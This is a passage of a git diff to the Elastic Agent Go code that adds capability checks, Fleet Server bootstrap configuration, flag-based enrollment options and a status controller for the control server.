reporter, monitor, statusCtrl)) if err != nil { return nil, errors.New(err, "fail to initialize pipeline router") } @@ -120,6 +127,7 @@ func newLocal( Decorators: []decoratorFunc{injectMonitoring}, Filters: []filterFunc{filters.StreamChecker}, }, + caps, monitor, ) if err != nil { @@ -145,7 +153,8 @@ func newLocal( []context.CancelFunc{localApplication.cancelCtxFn}, reexec, newNoopAcker(), - reporter) + reporter, + caps) uc.SetUpgrader(upgrader) return localApplication, nil diff --git a/x-pack/elastic-agent/pkg/agent/application/managed_mode.go b/x-pack/elastic-agent/pkg/agent/application/managed_mode.go index 9ad1f24a3d0d..c12c2451e3a8 100644 --- a/x-pack/elastic-agent/pkg/agent/application/managed_mode.go +++ b/x-pack/elastic-agent/pkg/agent/application/managed_mode.go @@ -20,6 +20,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -51,7 +52,7 @@ type Managed struct { Config configuration.FleetAgentConfig api apiClient agentInfo *info.AgentInfo - gateway *fleetGateway + gateway FleetGateway router *router srv *server.Server stateStore *stateStore @@ -61,51 +62,16 @@ type Managed struct { func newManaged( ctx context.Context, log *logger.Logger, + store storage.Store, + cfg *configuration.Configuration, rawConfig *config.Config, reexec reexecManager, + statusCtrl status.Controller, agentInfo *info.AgentInfo, ) (*Managed, error) { - statusController := status.NewController(log) - path := info.AgentConfigFile() - - store := storage.NewDiskStore(path) - reader, err := store.Load() - if err != nil { - return nil, errors.New(err, "could not initialize config store", - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - - config, err := config.NewConfigFrom(reader) - if err != nil { - return nil, errors.New(err, - fmt.Sprintf("fail to read configuration %s for the elastic-agent", path), - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - - // merge local configuration and configuration persisted from fleet. - err = rawConfig.Merge(config) - if err != nil { - return nil, errors.New(err, - fmt.Sprintf("fail to merge configuration with %s for the elastic-agent", path), - errors.TypeConfig, - errors.M(errors.MetaKeyPath, path)) - } - - cfg, err := configuration.NewFromConfig(rawConfig) + caps, err := capabilities.Load(info.AgentCapabilitiesPath(), log, statusCtrl) if err != nil { - return nil, errors.New(err, - fmt.Sprintf("fail to unpack configuration from %s", path), - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - - if err := cfg.Fleet.Valid(); err != nil { - return nil, errors.New(err, - "fleet configuration is invalid", - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) + return nil, err } client, err := fleetapi.NewAuthWithConfig(log, cfg.Fleet.AccessAPIKey, cfg.Fleet.Kibana) @@ -152,7 +118,7 @@ func newManaged( return nil, errors.New(err, "failed to initialize monitoring") } - router, err := newRouter(log, streamFactory(managedApplication.bgContext, agentInfo, cfg.Settings, managedApplication.srv, combinedReporter, monitor, statusController)) + router, err := newRouter(log, streamFactory(managedApplication.bgContext, agentInfo, cfg.Settings, managedApplication.srv, combinedReporter, monitor, statusCtrl)) if err != nil { return nil, errors.New(err, "fail to initialize pipeline router") } @@ -171,8 +137,9 @@ func newManaged( router, &configModifiers{ Decorators: []decoratorFunc{injectMonitoring}, - Filters: []filterFunc{filters.StreamChecker, injectFleet(config, sysInfo.Info(), agentInfo)}, + Filters: []filterFunc{filters.StreamChecker, injectFleet(rawConfig, sysInfo.Info(), agentInfo)}, }, + caps, monitor, ) if err != nil { @@ -205,7 +172,8 @@ func newManaged( []context.CancelFunc{managedApplication.cancelCtxFn}, reexec, acker, - combinedReporter) + combinedReporter, + caps) policyChanger := &handlerPolicyChange{ log: log, @@ -279,12 +247,16 @@ func newManaged( actionDispatcher, fleetR, actionAcker, - statusController, + statusCtrl, stateStore, ) if err != nil { return nil, err } + gateway, err = wrapLocalFleetServer(managedApplication.bgContext, log, cfg.Fleet, rawConfig, gateway, emit) + if err != nil { + return nil, err + } // add the gateway to setters, so the gateway can be updated // when the hosts for Kibana are updated by the policy. policyChanger.setters = append(policyChanger.setters, gateway) @@ -301,11 +273,15 @@ func (m *Managed) Start() error { return nil } - if err := m.upgrader.Ack(m.bgContext); err != nil { + err := m.upgrader.Ack(m.bgContext) + if err != nil { m.log.Warnf("failed to ack update %v", err) } - m.gateway.Start() + err = m.gateway.Start() + if err != nil { + return err + } return nil } diff --git a/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go b/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go index 4325c5ce7a63..890183e9033d 100644 --- a/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go @@ -39,7 +39,7 @@ func TestManagedModeRouting(t *testing.T) { agentInfo, _ := info.NewAgentInfo() nullStore := &storage.NullStore{} composableCtrl, _ := composable.New(log, nil) - emit, err := emitter(ctx, log, agentInfo, composableCtrl, router, &configModifiers{Decorators: []decoratorFunc{injectMonitoring}}) + emit, err := emitter(ctx, log, agentInfo, composableCtrl, router, &configModifiers{Decorators: []decoratorFunc{injectMonitoring}}, nil) require.NoError(t, err) actionDispatcher, err := newActionDispatcher(ctx, log, &handlerDefault{log: log}) diff --git a/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go b/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go index 61528e0b761e..b229f3cff080 100644 --- a/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go +++ b/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go @@ -5,17 +5,23 @@ package application import ( + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" ) type noopController struct{} -func (*noopController) Register(_ string) status.Reporter { return &noopReporter{} } -func (*noopController) Status() status.AgentStatus { return status.Healthy } -func (*noopController) UpdateStateID(_ string) {} -func (*noopController) StatusString() string { return "online" } +func (*noopController) RegisterComponent(_ string) status.Reporter { return &noopReporter{} } +func (*noopController) RegisterComponentWithPersistance(_ string, _ bool) status.Reporter { + return &noopReporter{} +} +func (*noopController) RegisterApp(_ string, _ string) status.Reporter { return &noopReporter{} } +func (*noopController) Status() status.AgentStatus { return status.AgentStatus{Status: status.Healthy} } +func (*noopController) StatusCode() status.AgentStatusCode { return status.Healthy } +func (*noopController) UpdateStateID(_ string) {} +func (*noopController) StatusString() string { return "online" } type noopReporter struct{} -func (*noopReporter) Update(status.AgentStatus) {} -func (*noopReporter) Unregister() {} +func (*noopReporter) Update(_ state.Status, _ string) {} +func (*noopReporter) Unregister() {} diff --git a/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go b/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go index 9b7a271a9d74..e23764b90564 100644 --- a/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go +++ b/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go @@ -18,6 +18,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/install" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" @@ -48,6 +49,7 @@ type Upgrader struct { acker acker reporter stateReporter upgradeable bool + caps capabilities.Capability } // Action is the upgrade action state. @@ -81,7 +83,7 @@ func IsUpgradeable() bool { } // NewUpgrader creates an upgrader which is capable of performing upgrade operation -func NewUpgrader(agentInfo *info.AgentInfo, settings *artifact.Config, log *logger.Logger, closers []context.CancelFunc, reexec reexecManager, a acker, r stateReporter) *Upgrader { +func NewUpgrader(agentInfo *info.AgentInfo, settings *artifact.Config, log *logger.Logger, closers []context.CancelFunc, reexec reexecManager, a acker, r stateReporter, caps capabilities.Capability) *Upgrader { return &Upgrader{ agentInfo: agentInfo, settings: settings, @@ -91,6 +93,7 @@ func NewUpgrader(agentInfo *info.AgentInfo, settings *artifact.Config, log *logg acker: a, reporter: r, upgradeable: IsUpgradeable(), + caps: caps, } } @@ -116,6 +119,12 @@ func (u *Upgrader) Upgrade(ctx context.Context, a Action, reexecNow bool) (err e "running under control of the systems supervisor") } + if u.caps != nil { + if _, err := u.caps.Apply(a); err == capabilities.ErrBlocked { + return nil + } + } + u.reportUpdating(a.Version()) sourceURI, err := u.sourceURI(a.Version(), a.SourceURI()) @@ -211,7 +220,7 @@ func (u *Upgrader) ackAction(ctx context.Context, action fleetapi.Action) error u.reporter.OnStateChange( "", agentName, - state.State{Status: state.Running}, + state.State{Status: state.Healthy}, ) return nil diff --git a/x-pack/elastic-agent/pkg/agent/cmd/enroll.go b/x-pack/elastic-agent/pkg/agent/cmd/enroll.go index 2ae011db291d..58c99306e710 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/enroll.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/enroll.go @@ -7,33 +7,27 @@ package cmd import ( "context" "fmt" - "math/rand" "os" - "time" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/client" + "os/signal" + "syscall" "github.com/spf13/cobra" - "github.com/elastic/beats/v7/libbeat/common/backoff" c "github.com/elastic/beats/v7/libbeat/common/cli" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/warn" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) -var defaultDelay = 1 * time.Second - func newEnrollCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ - Use: "enroll ", + Use: "enroll", Short: "Enroll the Agent into Fleet", Long: "This will enroll the Agent into Fleet.", - Args: cobra.ExactArgs(2), Run: func(c *cobra.Command, args []string) { if err := enroll(streams, c, flags, args); err != nil { fmt.Fprintf(streams.Err, "Error: %v\n", err) @@ -54,19 +48,51 @@ func newEnrollCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStr } func addEnrollFlags(cmd *cobra.Command) { + cmd.Flags().StringP("url", "", "", "URL to enroll Agent into Fleet") + cmd.Flags().StringP("kibana-url", "k", "", "URL of Kibana to enroll Agent into Fleet") + cmd.Flags().StringP("enrollment-token", "t", "", "Enrollment token to use to enroll Agent into Fleet") + cmd.Flags().StringP("fleet-server", "", "", "Start and run a Fleet Server along side this Elastic Agent") + cmd.Flags().StringP("fleet-server-policy", "", "", "Start and run a Fleet Server on this specific policy") cmd.Flags().StringP("certificate-authorities", "a", "", "Comma separated list of root certificate for server verifications") cmd.Flags().StringP("ca-sha256", "p", "", "Comma separated list of certificate authorities hash pins used for certificate verifications") cmd.Flags().BoolP("insecure", "i", false, "Allow insecure connection to Kibana") cmd.Flags().StringP("staging", "", "", "Configures agent to download artifacts from a staging build") } -func buildEnrollmentFlags(cmd *cobra.Command) []string { +func buildEnrollmentFlags(cmd *cobra.Command, url string, token string) []string { + if url == "" { + url, _ = cmd.Flags().GetString("url") + } + if url == "" { + url, _ = cmd.Flags().GetString("kibana-url") + } + if token == "" { + token, _ = cmd.Flags().GetString("enrollment-token") + } + fServer, _ := cmd.Flags().GetString("fleet-server") + fPolicy, _ := cmd.Flags().GetString("fleet-server-policy") ca, _ := cmd.Flags().GetString("certificate-authorities") sha256, _ := cmd.Flags().GetString("ca-sha256") insecure, _ := cmd.Flags().GetBool("insecure") staging, _ := cmd.Flags().GetString("staging") args := []string{} + if url != "" { + args = append(args, "--url") + args = append(args, url) + } + if token != "" { + args = append(args, "--enrollment-token") + args = append(args, token) + } + if fServer != "" { + args = append(args, "--fleet-server") + args = append(args, fServer) + } + if fPolicy != "" { + args = append(args, "--fleet-server-policy") + args = append(args, fPolicy) + } if ca != "" { args = append(args, "--certificate-authorities") args = append(args, ca) @@ -92,7 +118,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args } pathConfigFile := flags.Config() - rawConfig, err := application.LoadConfigFromFile(pathConfigFile) + rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return errors.New(err, fmt.Sprintf("could not read configuration file %s", pathConfigFile), @@ -115,9 +141,11 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args } } + noRestart, _ := cmd.Flags().GetBool("no-restart") force, _ := cmd.Flags().GetBool("force") if fromInstall { force = true + noRestart = true } // prompt only when it is not forced and is already enrolled @@ -132,23 +160,26 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args } } - insecure, _ := cmd.Flags().GetBool("insecure") - logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig) if err != nil { return err } - url := args[0] - enrollmentToken := args[1] + insecure, _ := cmd.Flags().GetBool("insecure") + url, _ := cmd.Flags().GetString("url") + if url == "" { + url, _ = cmd.Flags().GetString("kibana-url") + } + enrollmentToken, _ := cmd.Flags().GetString("enrollment-token") + fServer, _ := cmd.Flags().GetString("fleet-server") + fPolicy, _ := cmd.Flags().GetString("fleet-server-policy") caStr, _ := cmd.Flags().GetString("certificate-authorities") CAs := cli.StringToSlice(caStr) - caSHA256str, _ := cmd.Flags().GetString("ca-sha256") caSHA256 := cli.StringToSlice(caSHA256str) - delay(defaultDelay) + ctx := handleSignal(context.Background()) options := application.EnrollCmdOption{ ID: "", // TODO(ph), This should not be an empty string, will clarify in a new PR. @@ -159,6 +190,9 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args Insecure: insecure, UserProvidedMetadata: make(map[string]interface{}), Staging: staging, + FleetServerConnStr: fServer, + FleetServerPolicyID: fPolicy, + NoRestart: noRestart, } c, err := application.NewEnrollCmd( @@ -171,46 +205,29 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args return err } - err = c.Execute() - signal := make(chan struct{}) - - backExp := backoff.NewExpBackoff(signal, 60*time.Second, 10*time.Minute) - - for errors.Is(err, fleetapi.ErrTooManyRequests) { - fmt.Fprintln(streams.Out, "Too many requests on the remote server, will retry in a moment.") - backExp.Wait() - fmt.Fprintln(streams.Out, "Retrying to enroll...") - err = c.Execute() + err = c.Execute(ctx) + if err == nil { + fmt.Fprintln(streams.Out, "Successfully enrolled the Elastic Agent.") } + return err +} - close(signal) - - if err != nil { - return errors.New(err, "fail to enroll") - } +func handleSignal(ctx context.Context) context.Context { + ctx, cfunc := context.WithCancel(ctx) - fmt.Fprintln(streams.Out, "Successfully enrolled the Elastic Agent.") + sigs := make(chan os.Signal, 1) + signal.Notify(sigs, syscall.SIGINT, syscall.SIGKILL, syscall.SIGTERM, syscall.SIGQUIT) - // skip restarting - noRestart, _ := cmd.Flags().GetBool("no-restart") - if noRestart || fromInstall { - return nil - } - - daemon := client.New() - err = daemon.Connect(context.Background()) - if err == nil { - defer daemon.Disconnect() - err = daemon.Restart(context.Background()) - if err == nil { - fmt.Fprintln(streams.Out, "Successfully triggered restart on running Elastic Agent.") - return nil + go func() { + select { + case <-sigs: + cfunc() + case <-ctx.Done(): } - } - fmt.Fprintln(streams.Out, "Elastic Agent might not be running; unable to trigger restart") - return nil -} -func delay(t time.Duration) { - <-time.After(time.Duration(rand.Int63n(int64(t)))) + signal.Stop(sigs) + close(sigs) + }() + + return ctx } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/install.go b/x-pack/elastic-agent/pkg/agent/cmd/install.go index 7fd5b23ea18f..d978cd72d78d 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/install.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/install.go @@ -37,8 +37,6 @@ would like the Agent to operate. }, } - cmd.Flags().StringP("kibana-url", "k", "", "URL of Kibana to enroll Agent into Fleet") - cmd.Flags().StringP("enrollment-token", "t", "", "Enrollment token to use to enroll Agent into Fleet") cmd.Flags().BoolP("force", "f", false, "Force overwrite the current and do not prompt for confirmation") addEnrollFlags(cmd) @@ -93,9 +91,12 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, enroll := true askEnroll := true - kibana, _ := cmd.Flags().GetString("kibana-url") + url, _ := cmd.Flags().GetString("url") + if url == "" { + url, _ = cmd.Flags().GetString("kibana-url") + } token, _ := cmd.Flags().GetString("enrollment-token") - if kibana != "" && token != "" { + if url != "" && token != "" { askEnroll = false } if force { @@ -111,18 +112,18 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, enroll = false } } - if !askEnroll && (kibana == "" || token == "") { + if !askEnroll && (url == "" || token == "") { // force was performed without required enrollment arguments, all done (standalone mode) enroll = false } if enroll { - if kibana == "" { - kibana, err = c.ReadInput("Kibana URL you want to enroll this Agent into:") + if url == "" { + url, err = c.ReadInput("URL you want to enroll this Agent into:") if err != nil { return fmt.Errorf("problem reading prompt response") } - if kibana == "" { + if url == "" { fmt.Fprintf(streams.Out, "Enrollment cancelled because no URL was provided.\n") return nil } @@ -144,16 +145,33 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, return err } + defer func() { + if err != nil { + install.Uninstall() + } + }() + + err = install.StartService() + if err != nil { + fmt.Fprintf(streams.Out, "Installation failed to start Elastic Agent service.\n") + return err + } + + defer func() { + if err != nil { + install.StopService() + } + }() + if enroll { - enrollArgs := []string{"enroll", kibana, token, "--from-install"} - enrollArgs = append(enrollArgs, buildEnrollmentFlags(cmd)...) + enrollArgs := []string{"enroll", "--from-install"} + enrollArgs = append(enrollArgs, buildEnrollmentFlags(cmd, url, token)...) enrollCmd := exec.Command(install.ExecutablePath(), enrollArgs...) enrollCmd.Stdin = os.Stdin enrollCmd.Stdout = os.Stdout enrollCmd.Stderr = os.Stderr err = enrollCmd.Start() if err != nil { - install.Uninstall() return fmt.Errorf("failed to execute enroll command: %s", err) } err = enrollCmd.Wait() @@ -167,11 +185,5 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, } } - err = install.StartService() - if err != nil { - fmt.Fprintf(streams.Out, "Installation of required system files was successful, but starting of the service failed.\n") - return err - } - fmt.Fprintf(streams.Out, "Installation was successful and Elastic Agent is running.\n") return nil } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/run.go b/x-pack/elastic-agent/pkg/agent/cmd/run.go index eb1285855390..8d4157fdadd9 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/run.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/run.go @@ -16,6 +16,8 @@ import ( "strings" "syscall" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + "github.com/spf13/cobra" "github.com/elastic/beats/v7/libbeat/api" @@ -79,7 +81,7 @@ func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark se service.HandleSignals(stopBeat, cancel) pathConfigFile := flags.Config() - rawConfig, err := application.LoadConfigFromFile(pathConfigFile) + rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return errors.New(err, fmt.Sprintf("could not read configuration file %s", pathConfigFile), @@ -129,14 +131,16 @@ func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark se rexLogger := logger.Named("reexec") rex := reexec.NewManager(rexLogger, execPath) + statusCtrl := status.NewController(logger) + // start the control listener - control := server.New(logger.Named("control"), rex, nil) + control := server.New(logger.Named("control"), rex, statusCtrl, nil) if err := control.Start(); err != nil { return err } defer control.Stop() - app, err := application.New(logger, pathConfigFile, rex, control, agentInfo) + app, err := application.New(logger, pathConfigFile, rex, statusCtrl, control, agentInfo) if err != nil { return err } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/watch.go b/x-pack/elastic-agent/pkg/agent/cmd/watch.go index 01d73022f995..1124a9508934 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/watch.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/watch.go @@ -21,6 +21,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) @@ -182,7 +183,7 @@ func gracePeriod(marker *upgrade.UpdateMarker) (bool, time.Duration) { func configuredLogger(flags *globalFlags) (*logger.Logger, error) { pathConfigFile := flags.Config() - rawConfig, err := application.LoadConfigFromFile(pathConfigFile) + rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return nil, errors.New(err, fmt.Sprintf("could not read configuration file %s", pathConfigFile), diff --git a/x-pack/elastic-agent/pkg/agent/configuration/fleet.go b/x-pack/elastic-agent/pkg/agent/configuration/fleet.go index c8315b81cf08..af60651a3626 100644 --- a/x-pack/elastic-agent/pkg/agent/configuration/fleet.go +++ b/x-pack/elastic-agent/pkg/agent/configuration/fleet.go @@ -18,11 +18,17 @@ type FleetAgentConfig struct { Kibana *kibana.Config `config:"kibana" yaml:"kibana"` Reporting *fleetreporter.Config `config:"reporting" yaml:"reporting"` Info *AgentInfo `config:"agent" yaml:"agent"` + Server *FleetServerConfig `config:"server" yaml:"server,omitempty"` } // Valid validates the required fields for accessing the API. func (e *FleetAgentConfig) Valid() error { if e.Enabled { + if e.Server != nil && e.Server.Bootstrap { + // bootstrapping Fleet Server, checks below can be ignored + return nil + } + if len(e.AccessAPIKey) == 0 { return errors.New("empty access token", errors.TypeConfig) } diff --git a/x-pack/elastic-agent/pkg/agent/configuration/fleet_server.go b/x-pack/elastic-agent/pkg/agent/configuration/fleet_server.go new file mode 100644 index 000000000000..3ff7ad91b2e4 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/configuration/fleet_server.go @@ -0,0 +1,68 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package configuration + +import ( + "net/url" + + "github.com/elastic/beats/v7/libbeat/common/transport/tlscommon" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" +) + +// FleetServerConfig is the configuration written so Elastic Agent can run Fleet Server. +type FleetServerConfig struct { + Bootstrap bool `config:"bootstrap" yaml:"bootstrap,omitempty"` + Policy *FleetServerPolicyConfig `config:"policy" yaml:"policy,omitempty"` + Output FleetServerOutputConfig `config:"output" yaml:"output,omitempty"` +} + +// FleetServerPolicyConfig is the configuration for the policy Fleet Server should run on. +type FleetServerPolicyConfig struct { + ID string `config:"id"` +} + +// FleetServerOutputConfig is the connection for Fleet Server to call to Elasticsearch. +type FleetServerOutputConfig struct { + Elasticsearch Elasticsearch `config:"elasticsearch" yaml:"elasticsearch"` +} + +// Elasticsearch is the configuration for elasticsearch. +type Elasticsearch struct { + Protocol string `config:"protocol" yaml:"protocol"` + Hosts []string `config:"hosts" yaml:"hosts"` + Path string `config:"path" yaml:"path,omitempty"` + Username string `config:"username" yaml:"username"` + Password string `config:"password" yaml:"password"` + TLS *tlscommon.Config `config:"ssl" yaml:"ssl,omitempty"` +} + +// ElasticsearchFromConnStr returns an Elasticsearch configuration from the connection string. +func ElasticsearchFromConnStr(conn string) (Elasticsearch, error) { + u, err := url.Parse(conn) + if err != nil { + return Elasticsearch{}, err + } + if u.Scheme != "http" && u.Scheme != "https" { + return Elasticsearch{}, errors.New("invalid connection string: scheme must be http or https") + } + if u.Host == "" { + return Elasticsearch{}, errors.New("invalid connection string: must include a host") + } + if u.User == nil || u.User.Username() == "" { + return Elasticsearch{}, errors.New("invalid connection string: must include a username") + } + password, ok := u.User.Password() + if !ok { + return Elasticsearch{}, errors.New("invalid connection string: must include a password") + } + return Elasticsearch{ + Protocol: u.Scheme, + Hosts: []string{u.Host}, + Path: u.Path, + Username: u.User.Username(), + Password: password, + TLS: nil, + }, nil +} diff --git a/x-pack/elastic-agent/pkg/agent/control/control_test.go b/x-pack/elastic-agent/pkg/agent/control/control_test.go index 5c56aed46913..bcda4a0e4edf 100644 --- a/x-pack/elastic-agent/pkg/agent/control/control_test.go +++ b/x-pack/elastic-agent/pkg/agent/control/control_test.go @@ -8,6 +8,8 @@ import ( "context" "testing" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" @@ -20,7 +22,7 @@ import ( ) func TestServerClient_Version(t *testing.T) { - srv := server.New(newErrorLogger(t), nil, nil) + srv := server.New(newErrorLogger(t), nil, nil, nil) err := srv.Start() require.NoError(t, err) defer srv.Stop() @@ -41,6 +43,29 @@ func TestServerClient_Version(t *testing.T) { }, ver) } +func TestServerClient_Status(t *testing.T) { + l := newErrorLogger(t) + statusCtrl := status.NewController(l) + srv := server.New(l, nil, statusCtrl, nil) + err := srv.Start() + require.NoError(t, err) + defer srv.Stop() + + c := client.New() + err = c.Connect(context.Background()) + require.NoError(t, err) + defer c.Disconnect() + + status, err := c.Status(context.Background()) + require.NoError(t, err) + + assert.Equal(t, &client.AgentStatus{ + Status: client.Healthy, + Message: "", + Applications: []*client.ApplicationStatus{}, + }, status) +} + func newErrorLogger(t *testing.T) *logger.Logger { t.Helper() diff --git a/x-pack/elastic-agent/pkg/agent/control/server/server.go b/x-pack/elastic-agent/pkg/agent/control/server/server.go index 0ce970c92569..edd96efdad64 100644 --- a/x-pack/elastic-agent/pkg/agent/control/server/server.go +++ b/x-pack/elastic-agent/pkg/agent/control/server/server.go @@ -17,26 +17,29 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/proto" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) // Server is the daemon side of the control protocol. type Server struct { - logger *logger.Logger - rex reexec.ExecManager - up *upgrade.Upgrader - listener net.Listener - server *grpc.Server - lock sync.RWMutex + logger *logger.Logger + rex reexec.ExecManager + statusCtrl status.Controller + up *upgrade.Upgrader + listener net.Listener + server *grpc.Server + lock sync.RWMutex } // New creates a new control protocol server. -func New(log *logger.Logger, rex reexec.ExecManager, up *upgrade.Upgrader) *Server { +func New(log *logger.Logger, rex reexec.ExecManager, statusCtrl status.Controller, up *upgrade.Upgrader) *Server { return &Server{ - logger: log, - rex: rex, - up: up, + logger: log, + rex: rex, + statusCtrl: statusCtrl, + up: up, } } @@ -95,11 +98,11 @@ func (s *Server) Version(_ context.Context, _ *proto.Empty) (*proto.VersionRespo // Status returns the overall status of the agent. func (s *Server) Status(_ context.Context, _ *proto.Empty) (*proto.StatusResponse, error) { - // not implemented + status := s.statusCtrl.Status() return &proto.StatusResponse{ - Status: proto.Status_HEALTHY, - Message: "not implemented", - Applications: nil, + Status: agentStatusToProto(status.Status), + Message: status.Message, + Applications: agentAppStatusToProto(status.Applications), }, nil } @@ -158,3 +161,27 @@ func (r *upgradeRequest) FleetAction() *fleetapi.ActionUpgrade { // upgrade request not from Fleet return nil } + +func agentStatusToProto(code status.AgentStatusCode) proto.Status { + if code == status.Degraded { + return proto.Status_DEGRADED + } + if code == status.Failed { + return proto.Status_FAILED + } + return proto.Status_HEALTHY +} + +func agentAppStatusToProto(apps []status.AgentApplicationStatus) []*proto.ApplicationStatus { + s := make([]*proto.ApplicationStatus, len(apps)) + for i, a := range apps { + s[i] = &proto.ApplicationStatus{ + Id: a.ID, + Name: a.Name, + Status: proto.Status(a.Status.ToProto()), + Message: a.Message, + Payload: "", + } + } + return s +} diff --git a/x-pack/elastic-agent/pkg/agent/errors/error.go b/x-pack/elastic-agent/pkg/agent/errors/error.go index 7ce5c7703490..00c139c93c8e 100644 --- a/x-pack/elastic-agent/pkg/agent/errors/error.go +++ b/x-pack/elastic-agent/pkg/agent/errors/error.go @@ -54,6 +54,12 @@ func (e agentError) Unwrap() error { // Error returns a string consisting of a message and originating error. func (e agentError) Error() string { + if e.err == 